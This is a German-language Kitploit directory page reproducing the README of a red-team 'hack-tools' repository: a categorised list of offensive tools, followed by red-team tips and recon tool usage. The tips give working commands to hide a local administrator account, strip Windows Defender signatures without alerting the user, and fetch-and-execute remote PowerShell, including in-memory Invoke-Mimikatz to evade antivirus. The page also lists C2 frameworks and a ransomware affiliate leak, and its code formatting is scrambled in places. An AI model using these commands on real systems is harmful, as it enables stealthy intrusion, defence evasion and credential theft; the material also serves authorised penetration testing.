Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitLabGitLab/edu0x01/hack-tools
DefensivwerkzeugePhishing-ToolsPrivilege EscalationAufklärungExploit-FrameworksLaterale BewegungPenetrationstestsCommand and ControlLernen & BildungRed TeamingKuratierte RessourcenPayload-Entwicklung
2vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitLabedu0x01/hack-tools

Hack Tools

Projekt, das mehrere Pentest-Tools zusammenbringt

Repository anzeigenWebseite

Hack-Tools

Dieses Repository enthält eine Sammlung von über 200 Werkzeugen und Ressourcen, die für Red-Teaming-Aktivitäten nützlich sein können.

Einige der Werkzeuge wurden speziell für Red Teaming entwickelt, während andere allgemeinerer Natur sind und für den Einsatz im Red-Teaming-Kontext angepasst werden können.

Warnung

Die Materialien in diesem Repository dienen ausschließlich Informations- und Bildungszwecken. Sie sind nicht für illegale Aktivitäten bestimmt.

Hinweis

Blenden Sie die Überschriften der Werkzeugliste mit dem Pfeil ein/aus.

Klicken Sie auf 🔙, um zur Liste zurückzukehren.

Befehl zum Klonen```bash

git submodule update --init --recursive

root@kitploit:~
### Neues Projekt hinzufügen```bash
git submodule add https://github.com/example.git

docs: https://git-scm.com/book/en/v2/Git-Tools-Submodules

Werkzeugliste

Red Team Tipps $\textcolor{gray}{\text{13 Tipps}}$
    • Lokales Administratorkonto verstecken @Alh4zr3d
    • Windows Defender durch Löschen von Signaturen lahmlegen @Alh4zr3d
    • Mehrere RDP-Sitzungen pro Benutzer aktivieren @Alh4zr3d
    • Sysinternals PsExec.exe lokale Alternative @GuhnooPlusLinux
    • Live off the land Portscanner @Alh4zr3d
    • Proxy-bewusster PowerShell DownloadString @Alh4zr3d
    • Suche nach internen Endpunkten in Browser-Lesezeichen @Alh4zr3d
    • DNS-Einträge für Aufzählung abfragen @Alh4zr3d
    • Unquotierte Dienstpfade ohne PowerUp @Alh4zr3d
    • Deaktivierte Eingabeaufforderung mit /k umgehen Martin Sohn Christensen
    • Windows Defender daran hindern, mimikatz.exe zu löschen @GuhnooPlusLinux
    • Prüfen, ob Sie sich in einer virtuellen Maschine befinden @dmcxblue
    • AppLocker-Regeln auflisten @Alh4zr3d
Aufklärung $\textcolor{gray}{\text{20 Tools}}$
    • crt.sh -> httprobe -> EyeWitness Automatisiertes Domain-Screenshotting
    • jsendpoints Seite DOM-Links extrahieren
    • nuclei Schwachstellenscanner
    • certSniff Certificate-Transparency-Log-Stichwort-Sniffer
    • gobuster Website-Pfad-Brute-Force
    • feroxbuster Schnelles Content-Discovery-Tool in Rust
    • CloudBrute Cloud-Infrastruktur-Brute-Force
    • dnsrecon DNS-Einträge aufzählen
    • Shodan.io Wissensdatenbank für öffentlich zugängliche Systeme
    • AORT (All in One Recon Tool) Subdomain-Aufzählung
    • spoofcheck SPF-/DMARC-Eintragsprüfung
    • AWSBucketDump S3-Bucket-Aufzählung
    • GitHarvester GitHub-Anmeldedaten-Suche
    • truffleHog GitHub-Anmeldedaten-Scanner
    • Dismap Asset-Erkennung/-Identifikation
    • enum4linux Windows-/Samba-Aufzählung
    • skanuvaty Gefährlich schneller DNS-/Netzwerk-/Portscanner
    • Metabigor OSINT-Tool ohne API
    • Gitrob GitHub-Scanner für sensible Informationen
    • gowitness Web-Screenshot-Dienstprogramm mit Chrome Headless
Ressourcenentwicklung $\textcolor{gray}{\text{8 Tools}}$
    • Chimera PowerShell-Verschleierung
    • msfvenom Payload-Erstellung
    • Shellter Dynamisches Shellcode-Injection-Tool
    • Freeze Payload-Erstellung (Umgehung von EDR)
    • WordSteal NTML-Hashes mit Microsoft Word stehlen
    • WSH Wsh-Payload
    • HTA Hta-Payload
    • VBA Vba-Payload
Erstzugriff $\textcolor{gray}{\text{6 Tools}}$
    • Bash Bunny USB-Angriffstool
    • EvilGoPhish Phishing-Kampagnen-Framework
    • The Social-Engineer Toolkit Phishing-Kampagnen-Framework
    • Hydra Brute-Force-Tool
    • SquarePhish OAuth-/QR-Code-Phishing-Framework
    • King Phisher Phishing-Kampagnen-Framework
Ausführung $\textcolor{gray}{\text{12 Tools}}$
    • Responder LLMNR-, NBT-NS- und MDNS-Vergifter
    • secretsdump Remote-Hash-Dumper
    • evil-winrm WinRM-Shell
    • Donut In-Memory-.NET-Ausführung
    • Macro_pack Makro-Verschleierung
    • PowerSploit PowerShell-Skriptsammlung
    • Rubeus Active-Directory-Hack-Tool
    • SharpUp Windows-Schwachstellenidentifikator
    • SQLRecon Angriffs-MS-SQL-Toolkit
    • UltimateAppLockerByPassList Gängige AppLocker-Umgehungstechniken
    • StarFighters JavaScript- und VBScript-basierter Empire-Launcher
    • demiguise HTA-Verschlüsselungstoola
Persistenz $\textcolor{gray}{\text{4 Tools}}$
    • Impacket Python-Skriptsammlung
    • Empire Post-Exploitation-Framework
    • SharPersist Windows-Persistenz-Toolkit
    • ligolo-ng Tunneling-Tool, das eine TUN-Schnittstelle verwendet
Privilegieneskalation $\textcolor{gray}{\text{9 Tools}}$
    • LinPEAS Linux-Privilegieneskalation
    • WinPEAS Windows-Privilegieneskalation
    • linux-smart-enumeration Linux-Privilegieneskalation
    • Certify Active-Directory-Privilegieneskalation
    • Get-GPPPassword Windows-Passwort-Extraktion
    • Sherlock PowerShell-Privilegieneskalationstool
    • Watson Windows-Privilegieneskalationstool
    • ImpulsiveDLLHijack DLL-Hijack-Tool
    • ADFSDump AD-FS-Dump-Tool
Verteidigungsumgehung $\textcolor{gray}{\text{5 Tools}}$
    • Invoke-Obfuscation Skript-Verschleierer
    • Veil Metasploit-Payload-Verschleierer
    • SharpBlock EDR-Umgehung durch Einstiegspunkt-Ausführungsverhinderung
    • Alcatraz GUI-x64-Binärverschleierer
    • Mangle Manipulation kompilierter ausführbarer Dateien
    • AMSI Fail PowerShell-Snippets, die AMSI unterbrechen oder deaktivieren
Zugangsdatenzugriff $\textcolor{gray}{\text{9 Tools}}$
    • Mimikatz Windows-Anmeldedaten-Extraktor
    • LaZagne Lokaler Passwort-Extraktor
    • hashcat Passwort-Hash-Knacken
    • John the Ripper Passwort-Hash-Knacken
    • SCOMDecrypt SCOM-Anmeldedaten-Entschlüsselungstool
    • nanodump LSASS-Prozess-Minidump-Erstellung
    • eviltree Tree-Neuerstellung zur Anmeldedaten-Erkennung
    • SeeYouCM-Thief Konfigurationsdatei-Parsing von Cisco-Telefonanlagen
    • MailSniper Microsoft Exchange Mail-Sucher
Entdeckung $\textcolor{gray}{\text{6 Tools}}$
    • PCredz Anmeldedaten-Erkennung in PCAP/Live-Schnittstelle
    • PingCastle Active-Directory-Bewerter
    • Seatbelt Lokaler Schwachstellenscanner
    • ADRecon Active-Directory-Aufklärung
    • adidnsdump Active Directory Integrated DNS-Ausgabe
    • scavenger Scann-Tool zum Durchsuchen von Systemen
Laterale Bewegung $\textcolor{gray}{\text{12 Tools}}$
    • crackmapexec Windows/Active-Directory-laterale-Bewegung-Toolkit
    • WMIOps WMI-Fernbefehle
    • PowerLessShell Remote-PowerShell ohne PowerShell
    • PsExec Leichter Telnet-Ersatz
    • LiquidSnake Dateilose laterale Bewegung
    • RDP aktivieren Windows-RDP-Aktivierungsbefehl
    • Shell zu Meterpreter upgraden Reverse-Shell-Verbesserung
    • Portweiterleitung Lokaler Port-Forward-Befehl
    • Jenkins-Reverse-Shell Jenkins-Shell-Befehl
    • ADFSpoof AD FS-Sicherheitstoken fälschen
    • kerbrute Ein Tool zum Durchführen von Kerberos-Pre-Auth-Brute-Force
    • Coercer Einen Windows-Server zur Authentifizierung zwingen
Sammlung $\textcolor{gray}{\text{3 Tools}}$
    • BloodHound Active-Directory-Visualisierung
    • Snaffler Active-Directory-Anmeldedaten-Sammler
    • linWinPwn Active-Directory-Aufzählung und Schwachstellenprüfungen
Befehl und Kontrolle $\textcolor{gray}{\text{6 Tools}}$
    • Havoc Command-and-Control-Framework
    • Covenant Command-and-Control-Framework (.NET)
    • Merlin Command-and-Control-Framework (Golang)
    • Metasploit Framework Command-and-Control-Framework (Ruby)
    • Pupy Command-and-Control-Framework (Python)
    • Brute Ratel Command-and-Control-Framework ($$$)
Exfiltration $\textcolor{gray}{\text{5 Tools}}$
    • Dnscat2 C2 über DNS-Tunneling
    • Cloakify Datentransformation zur Exfiltration
    • PyExfil Datenexfiltrations-PoC
    • Powershell RAT Python-basierter Backdoor
    • GD-Thief Google-Drive-Exfiltration
Auswirkung $\textcolor{gray}{\text{3 Tools}}$
    • Conti Pentester Guide Leak Conti-Ransomware-Gruppen-Affiliate-Toolkit
    • SlowLoris Einfacher Denial of Service
    • usbkill Anti-forensischer Kill-Switch

Red Team Tipps

Lernen Sie von Red Teamern mit einer Sammlung von Red Teaming Tipps. Diese Tipps decken eine Reihe von Taktiken, Tools und Methoden ab, um Ihre Red Teaming Fähigkeiten zu verbessern.

Hinweis: Fast alle Tipps stammen derzeit von @Alh4zr3d, er veröffentlicht gute Red Team Tipps!

🔙Lokales Administratorkonto verstecken```bash

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

root@kitploit:~
**Beschreibung:** _'Das Erstellen von Konten ist riskant, wenn man Blue ausweicht, aber wenn man einen lokalen Administrator erstellt, sollte man etwas nette Zauberei in der Registry anwenden, um ihn zu verstecken.'_

**Quelle:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)

### [🔙](#tool-list)Windows Defender durch Löschen von Signaturen lahmlegen```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Beschreibung: 'Etwas chaotisch, aber wenn Windows Defender dir große Kopfschmerzen bereitet, anstatt ihn zu deaktivieren (was den Benutzer alarmiert), solltest du ihn einfach neutralisieren, indem du alle Signaturen löschst.'

Quelle: @Alh4zr3d

Link: Twitter

🔙Mehrere RDP-Sitzungen pro Benutzer aktivieren```bash

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

root@kitploit:~
**Beschreibung:** _'Manchmal möchte man sich per RDP oder ähnlich bei einem Host anmelden, aber der Benutzer hat eine aktive Sitzung. Mehrere Sitzungen pro Benutzer aktivieren.'_

**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)

### [🔙](#tool-list)Lokale Alternative zu Sysinternals PsExec.exe```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

Beschreibung: 'Haben Sie es satt, beim lateralen Movement ständig die Sysinternals PsExec.exe hochzuladen? Windows hat eine bessere Alternative vorinstalliert. Probieren Sie stattdessen dies aus.'

Quelle: @GuhnooPlusLinux

Link: Twitter

🔙Live off the land port scanner```bash

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null

root@kitploit:~
**Beschreibung:** _'Wenn möglich, nutze das aus, was bereits vorhanden ist, anstatt Tools auf Maschinen hochzuladen (aus vielen Gründen). PowerShell/.NET helfen. Beispiel: einfacher Port-Scanner in PowerShell.'_

**Gutschrift:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)

### [🔙](#tool-list)Proxy-fähiger PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

Beschreibung: 'Die meisten großen Organisationen nutzen heutzutage Web-Proxies. Die standardmäßige PowerShell-Download-Cradle ist nicht proxy-fähig. Verwenden Sie diese hier.'

Credit: @Alh4zr3d

Link: Twitter

🔙Suche nach internen Endpunkten in Browser-Lesezeichen```bash

type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

root@kitploit:~
**Beschreibung:** _'Sie wären überrascht, was man allein aus den Lesezeichen eines Benutzers herausfinden kann. Interne Endpunkte, auf die sie zugreifen können, zum Beispiel.'_

**Quelle:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)

### [🔙](#tool-list)DNS-Einträge zur Enumeration abfragen```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

Beschreibung: 'Enumeration ist 95% des Spiels. Aber massenhaft Scans zu starten, um die Umgebung zu bewerten, ist sehr laut. Warum nicht einfach den DC/DNS-Server nach allen DNS-Einträgen fragen?'

Quelle: @Alh4zr3d

Link: Twitter

🔙Unquoted service paths ohne PowerUp```bash

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

root@kitploit:~
**Beschreibung:** _'Unquotierte Dienstpfade ohne PowerUp finden'_

**Quelle:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)

### [🔙](#tool-list)Umgehung einer deaktivierten Eingabeaufforderung mit /k```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

Beschreibung: 'Diese Eingabeaufforderung wurde von Ihrem Administrator deaktiviert...' Kann normalerweise in Umgebungen wie Kiosk-PCs gesehen werden. Ein schneller Hack-Umgehung ist die Verwendung von /k über das Windows-Ausführungsfenster. Dies führt den Befehl aus und zeigt dann die Einschränkungsmeldung an, was die Befehlsausführung ermöglicht.

Autor: Martin Sohn Christensen

Link: Blog

🔙Windows Defender daran hindern, mimikatz.exe zu löschen```bash

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

root@kitploit:~
**Beschreibung:** _'Bist du es leid, dass Windows Defender mimikatz.exe löscht? Versuche stattdessen dies.'_

**Credit:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)

**Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)

### [🔙](#tool-list)Überprüfen, ob du in einer virtuellen Maschine bist```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

Beschreibung: 'Möchtest du wissen, ob du in einer virtuellen Maschine bist? Frage die Registrierungsschlüssel ab und finde es heraus!!! Wenn Ergebnisse angezeigt werden, bist du in einer virtuellen Maschine.'

Credit: @dmcxblue

Link: Twitter

🔙AppLocker-Regeln aufzählen```

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

root@kitploit:~
**Beschreibung:** _'AppLocker kann eine Qual sein. Aufzählen, um zu sehen, wie schmerzhaft es ist'_

**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)

# Aufklärung

### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness

Ich habe einen Bash-Einzeiler zusammengestellt, der:

- Passiv eine Liste von Subdomains aus Zertifikatsassoziationen sammelt ([crt.sh](https://crt.sh/))
- Aktiv jede Subdomain abfragt, um ihre Existenz zu überprüfen ([httprobe](https://github.com/tomnomnom/httprobe))
- Aktiv Screenshots jeder Subdomain zur manuellen Überprüfung erstellt ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))

**Verwendung:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

Note: Sie benötigen httprobe, pup und EyeWitness, installiert und ändern Sie 'DOMAIN_COM' zur Ziel-Domain. Sie können dieses Skript gleichzeitig in Terminal-Fenstern ausführen, wenn Sie mehrere Root-Domains als Ziel haben

image

image

🔙jsendpoints

Ein JavaScript-Lesezeichen für die Extraktion aller Webseiten-Endpunkt-Links auf einer Seite.

Erstellt von @renniepak, mit diesem JavaScript-Code-Schnipsel können alle Endpunkte (beginnend mit /) aus dem aktuellen Webseiten-DOM extrahiert werden, einschließlich aller externen Skriptquellen, die auf der Webseite eingebettet sind.```javascript javascript: (function () { var scripts = document.getElementsByTagName("script"), regex = /(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g; const results = new Set(); for (var i = 0; i < scripts.length; i++) { var t = scripts[i].src; "" != t && fetch(t) .then(function (t) { return t.text(); }) .then(function (t) { var e = t.matchAll(regex); for (let r of e) results.add(r[0]); }) .catch(function (t) { console.log("An error occurred: ", t); }); } var pageContent = document.documentElement.outerHTML, matches = pageContent.matchAll(regex); for (const match of matches) results.add(match[0]); function writeResults() { results.forEach(function (t) { document.write(t + "
"); }); } setTimeout(writeResults, 3e3); })();

root@kitploit:~
**Usage (Bookmarklet)**

Create a bookmarklet...

- `Right click your bookmark bar`
- `Click 'Add Page'`
- `Paste the above Javascript in the 'url' box`
- `Click 'Save'`

...then visit the victim page in the browser and click the bookmarklet.

![image](https://assets.kitploit.com/production/public/readmes/495/a2a9b8ff2cacdcf419b64a6d99075dffa73471eea1201fb9a0a6b2524794849f.png)

**Usage (Console)**

Paste the above Javascript into the console window `F12` and press enter.

![image](https://assets.kitploit.com/production/public/readmes/495/5dd2a02f0f6874c521b8a98f35f653b1cf1a13b00a4c7e3eaf7c111700c0cc8a.png)

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)

Fast vulnerability scanner that uses .yaml templates to search for specific issues.

**Install:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Verwendung:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

root@kitploit:~
![Bild](https://assets.kitploit.com/production/public/readmes/495/a747b7be6260c2a228ac90ac4c3500debb25dd3bf1f635c5ce736159cdd7bc81.png)

### [🔙](#tool-list)[nuclei-templates](https://github.com/projectdiscovery/nuclei-templates.git)

<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">Von der Community kuratierte Liste von Vorlagen für die nuclei-Engine, um Sicherheitslücken in Anwendungen zu finden.</h4>

<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
      
<p align="center">
  <a href="https://nuclei.projectdiscovery.io/templating-guide/">Dokumentation</a> •
  <a href="#-contributions">Beiträge</a> •
  <a href="#-discussion">Diskussion</a> •
  <a href="#-community">Community</a> •
  <a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
  <a href="https://discord.gg/projectdiscovery">DC beitreten</a>
</p>

---

Vorlagen sind der Kern des [nuclei-Scanners](https://github.com/projectdiscovery/nuclei), der die eigentliche Scan-Engine antreibt.
Dieses Repository speichert und beherbergt verschiedene Vorlagen für den Scanner, die von unserem Team bereitgestellt sowie von der Community beigetragen wurden.
Wir hoffen, dass auch Sie Vorlagen per **Pull-Requests** oder [Github Issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) beisteuern, um die Liste zu erweitern.

## Nuclei Templates Überblick

Ein Überblick über das nuclei-template-Projekt, einschließlich Statistiken zu eindeutigen Tags, Autoren, Verzeichnissen, Schweregraden und Vorlagentypen. Die folgende Tabelle enthält die zehn wichtigsten Statistiken für jede Kategorie; eine erweiterte Version ist [hier verfügbar](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.md), sowie im [JSON](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.json)-Format zur Integration.

<table>
<tr>
<td>

## Nuclei Templates Top-10-Statistiken

| TAG       | ANZAHL | AUTOR        | ANZAHL | VERZEICHNIS          | ANZAHL | SCHWEREGRAD | ANZAHL | TYP  | ANZAHL |
| --------- | ------ | ------------ | ------ | -------------------- | ------ | ----------- | ------ | ---- | ------ |
| cve       | 1855   | dhiyaneshdk  | 835    | http                 | 5860   | info        | 2857   | file | 123    |
| panel     | 896    | dwisiswant0  | 794    | workflows            | 190    | high        | 1270   | dns  | 18     |
| wordpress | 781    | daffainfo    | 664    | file                 | 123    | medium      | 1042   |      |        |
| exposure  | 677    | pikpikcu     | 353    | network              | 93     | critical    | 704    |      |        |
| wp-plugin | 672    | pdteam       | 278    | dns                  | 18     | low         | 216    |      |        |
| xss       | 646    | pussycat0x   | 240    | ssl                  | 12     | unknown     | 26     |      |        |
| osint     | 639    | geeknik      | 220    | headless             | 9      |             |        |      |        |
| tech      | 602    | ricardomaia  | 215    | TEMPLATES-STATS.json | 1      |             |        |      |        |
| edb       | 596    | ritikchaddha | 210    | contributors.json    | 1      |             |        |      |        |
| lfi       | 548    | 0x_akoko     | 179    | cves.json            | 1      |             |        |      |        |

**404 Verzeichnisse, 6542 Dateien**.

</td>
</tr>
</table>

## 📖 Dokumentation

Bitte navigieren Sie zu https://nuclei.projectdiscovery.io für eine ausführliche Dokumentation, um neue oder eigene **benutzerdefinierte** Vorlagen zu **erstellen**.
Wir haben auch eine Reihe von Vorlagen hinzugefügt, um Ihnen zu helfen zu verstehen, wie die Dinge funktionieren.

## 💪 Beiträge

Nuclei-templates wird durch wichtige Beiträge aus der Community unterstützt.
[Vorlagenbeiträge](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Funktionsanfragen](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) und [Fehlermeldungen](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) sind mehr als willkommen.

![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats-Analysebild")

## 💬 Diskussion

Haben Sie Fragen / Zweifel / Ideen zur Diskussion?
Eröffnen Sie gerne eine Diskussion im [Github-Diskussionsforum](https://github.com/projectdiscovery/nuclei-templates/discussions).

## 👨‍💻 Community

Sie sind herzlich eingeladen, der aktiven [Discord-Community](https://discord.gg/projectdiscovery) beizutreten, um direkt mit den Projektbetreuern zu diskutieren und Dinge mit anderen in den Bereichen Sicherheit und Automatisierung zu teilen.
Außerdem können Sie uns auf [Twitter](https://twitter.com/pdnuclei) folgen, um über alle Neuigkeiten rund um Nuclei auf dem Laufenden zu bleiben.

<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
  <img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&amp;max=300">
</a>
</p>

Nochmals vielen Dank für Ihren Beitrag und dafür, dass diese Community lebendig bleibt. :heart:

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)

certSniff ist ein Keyword-Überwachungstool für Certificate Transparency-Logs, das ich in Python geschrieben habe. Es verwendet die certstream-Bibliothek, um nach Zertifikatserstellungslogs zu suchen, die Schlüsselwörter enthalten, die in einer Datei definiert sind.

Sie können dies mit mehreren Schlüsselwörtern ausführen, die sich auf Ihre Opferdomain beziehen. Alle erstellten Zertifikate werden aufgezeichnet und können zur Entdeckung von Domains führen, die Ihnen zuvor nicht bekannt waren.

**Installation:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

Verwendung:```python python3 certSniff.py -f example.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/5cfb98ddfd270f9f57aa774a49dd21ee41ae79bbf430e012834e9c85cf221c5e.png)

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)

Nützliches Tool zum Brute-Forcing von Datei-/Ordnerpfaden auf einer Opfer-Website.

**Installation:**```bash
sudo apt install gobuster

Verwendung:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/49bbb3fa465f423a5b3fa1dbe2468cb9c70ad4600532825a759da5b911a2c890.png)

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)

Ein Werkzeug, das für Forced Browsing entwickelt wurde, einen Angriff, bei dem das Ziel darin besteht, Ressourcen aufzulisten und darauf zuzugreifen, die von der Webanwendung nicht referenziert werden, aber für einen Angreifer dennoch zugänglich sind.

Feroxbuster verwendet Brute Force in Kombination mit einer Wortliste, um nach unverlinkten Inhalten in Zielverzeichnissen zu suchen. Diese Ressourcen können sensible Informationen über Webanwendungen und Betriebssysteme speichern, wie z. B. Quellcode, Anmeldeinformationen, interne Netzwerkadressen usw.

**Installation: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster

Installation: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

root@kitploit:~
**Installation: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

Vollständige Installationsanweisungen finden Sie hier.

Nutzung:```bash

Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

Scan with headers

./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

Read URLs from stdin

cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy requests through burpsuite

./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

root@kitploit:~
Vollständige Nutzungsbeispiele finden Sie [hier](https://epi052.github.io/feroxbuster-docs/docs/examples/).

![image](https://assets.kitploit.com/production/public/readmes/495/bddd1a012eb92f79a03b1f6dd3cb9f31a9b0751776541044adcf234332421a08.png)

_Bild verwendet von https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif_

### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)

Ein Tool zum Auffinden der Infrastruktur, Dateien und Apps eines Unternehmens (Ziels) auf den wichtigsten Cloud-Anbietern (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).

Funktionen:

- Cloud-Erkennung (IPINFO-API und Quellcode)
- Schnell (gleichzeitig)
- Plattformübergreifend (Windows, Linux, Mac)
- User-Agent-Randomisierung
- Proxy-Randomisierung (HTTP, Socks5)

**Installation:**

Laden Sie die neueste [Version](https://github.com/0xsha/CloudBrute/releases) für Ihr System herunter und folgen Sie der Nutzungsanleitung.

**Nutzung:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

Bild verwendet von https://github.com/0xsha/CloudBrute

🔙dnsrecon

dnsrecon ist ein pyhton-Tool zur Aufzählung von DNS-Einträgen (MX, SOA, NS, A, AAAA, SPF und TXT) und kann aus einer einzelnen Domain-Suche eine Reihe neuer zugehöriger Opfer-Hosts liefern, um von dort aus weiterzugehen.

Installation:```bash sudo apt install dnsrecon

root@kitploit:~
**Verwendung:**```bash
dnsrecon -d google.com

image

🔙shodan.io

Shodan durchsucht die öffentliche Infrastruktur und stellt sie in einem durchsuchbaren Format dar. Mit einem Firmennamen, einer Domain oder einer IP-Adresse ist es möglich, über Shodan potenziell verwundbare Systeme im Zusammenhang mit Ihrem Ziel zu entdecken.

image

🔙AORT

Tool zum Aufzählen von Subdomains, DNS-Enumeration, WAF-Erkennung, WHOIS, Port-Scan, Wayback-Machine und E-Mail-Harvesting.

Installation:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

root@kitploit:~
**Nutzung:**```python
python3 AORT.py -d google.com

image

🔙spoofcheck

Ein Programm, das prüft, ob eine Domain gespoofed werden kann. Das Programm überprüft SPF- und DMARC-Einträge auf schwache Konfigurationen, die Spoofing ermöglichen. Zusätzlich wird es warnen, wenn die Domain eine DMARC-Konfiguration hat, die E-Mails oder HTTP-Anfragen bei fehlgeschlagenen SPF/DKIM-E-Mails sendet.

Domains sind spoofbar, wenn eine der folgenden Bedingungen erfüllt ist:

  • Fehlen eines SPF- oder DMARC-Eintrags
